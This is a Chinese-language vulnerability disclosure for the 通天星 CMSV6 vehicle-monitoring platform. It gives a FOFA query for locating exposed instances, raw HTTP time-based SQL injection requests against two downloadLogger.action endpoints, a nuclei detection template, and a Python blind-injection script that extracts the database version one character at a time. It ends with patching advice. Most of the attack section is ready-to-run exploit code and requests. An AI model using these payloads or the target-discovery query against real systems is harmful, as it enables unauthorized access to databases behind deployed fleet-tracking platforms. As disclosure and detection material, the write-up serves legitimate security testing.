0x00、声明
本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。
中华人民共和国网络安全法
第二十七条 规定
任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具;明知他人从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
0x01、产品概述
通天星CMSV6车载定位监控平台包括了WIFI自动下载、TTS语音信息下发、校车刷卡、油量统计、3G/4G视频监控、GPS位置定位、远程录像回放、轨迹查询等一体的综合性平台
0x02、漏洞描述:
通天星CMSV6车载定位监控平台disable;downloadLogger.action、delete.do;downloadLogger.action接口存在SQL注入。
0x03、资产测绘
FOFA:body="/808gps/"
0x04、漏洞复现
4.1、数据包测试
1、/run_stop/delete.do;downloadLogger.action
GET /run_stop/delete.do;downloadLogger.action?ids=1+and+sleep(5) HTTP/1.1
Host: {host}
2、/edu_security_officer/disable;downloadLogger.action
GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+1=if(1=1,sleep(2),1) HTTP/1.1
Host: {host}
4.2、nuclei_POC测试
id: CMSV6_sql
info:
name: CMSV6_sql_inject
author: kzzzqqwewqwq
severity: medium
metadata:
fofa-query: body="/808gps/"
requests:
- raw:
- |+
@timeout: 30s
GET /edu_security_officer/disable;downloadLogger.action?ids=1+and+sleep(2) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
- |
GET /edu_security_officer/disable;downloadLogger.action?ids=1+and+sleep(5) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
- |
GET /run_stop/delete.do;downloadLogger.action?ids=1+and+sleep(5) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
matchers-condition: or
matchers:
- type: dsl
condition: and
dsl:
- status_code_1 == 200
- (duration_2 >=5 && duration_2 < 7) && status_code_2 == 200
- type: dsl
condition: and
dsl:
- (duration_3 >=5 && duration_3 < 7) && status_code_3 == 200
4.3、py脚本
探测是否存在漏洞并遍历出其版本名
# -*- coding: utf-8 -*-
import time
import sys
import requests
requests.packages.urllib3.disable_warnings()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a1b)XWEB/9165"
}
def len_(url0, sql_1):
len_f = 0
for lens in range(1, 15):
url = f"{url0}?ids=1+AND+1=if(length({sql_1})={lens},sleep(3),1)"
try:
a = time.time()
rep_p = requests.get(url=url, headers=headers, timeout=10)
b = time.time()
if (b - a) > 3 and (b - a) < 4 and rep_p.status_code == 200:
print(f"{url0} exist vuln !!!\nfind the {sql_1} length is:", lens)
len_f = lens
return len_f
except requests.exceptions.RequestException as e:
print("An error occurred:", e)
if len_f == 0:
print(f"find length fail !!!! please check !!!")
sys.exit()
return len_f
def name_(lens, url0, sql_1):
name_p = []
for N_char in range(lens + 1):
for nm_char in "abcdefghijklmnopqrstuvwxyz0123456789-_~@.":
url = f"{url0}?ids=1+AND+1=if(substr(({sql_1}),{N_char},1)='{nm_char}',sleep(4),1)"
try:
a = time.time()
rep_p = requests.get(url=url, headers=headers, timeout=10)
b = time.time()
if (b - a) > 4 and (b - a) < 5 and rep_p.status_code == 200:
name_p.append(nm_char.strip())
break
except requests.exceptions.RequestException as e:
print("An error occurred:", e)
if name_p == 0:
print(f"find name fail !!!! please check !!!")
sys.exit()
print(f"find the {sql_1} is : ", "".join(name_p))
if __name__ == "__main__":
url = "http://host" #host改为测试地址
sql_1 = "@@version"
path = [
"/run_stop/delete.do;downloadLogger.action",
"/edu_security_officer/disable;downloadLogger.action",
]
for ph in path:
url0 = f"{url}{ph}"
name_(len_(url0, sql_1), url0, sql_1)
print("over!!")
0x05、修复建议
临时缓解方案
使用预编译语句,绑定变量;输入验证和过滤;使用防护设备进行防护。如非必要,不要将受影响系统放置在公网上。
升级修复方案
官方已发布新版本修复漏洞,建议尽快访问官网或联系官方售后支持获取版本升级安装包或补丁。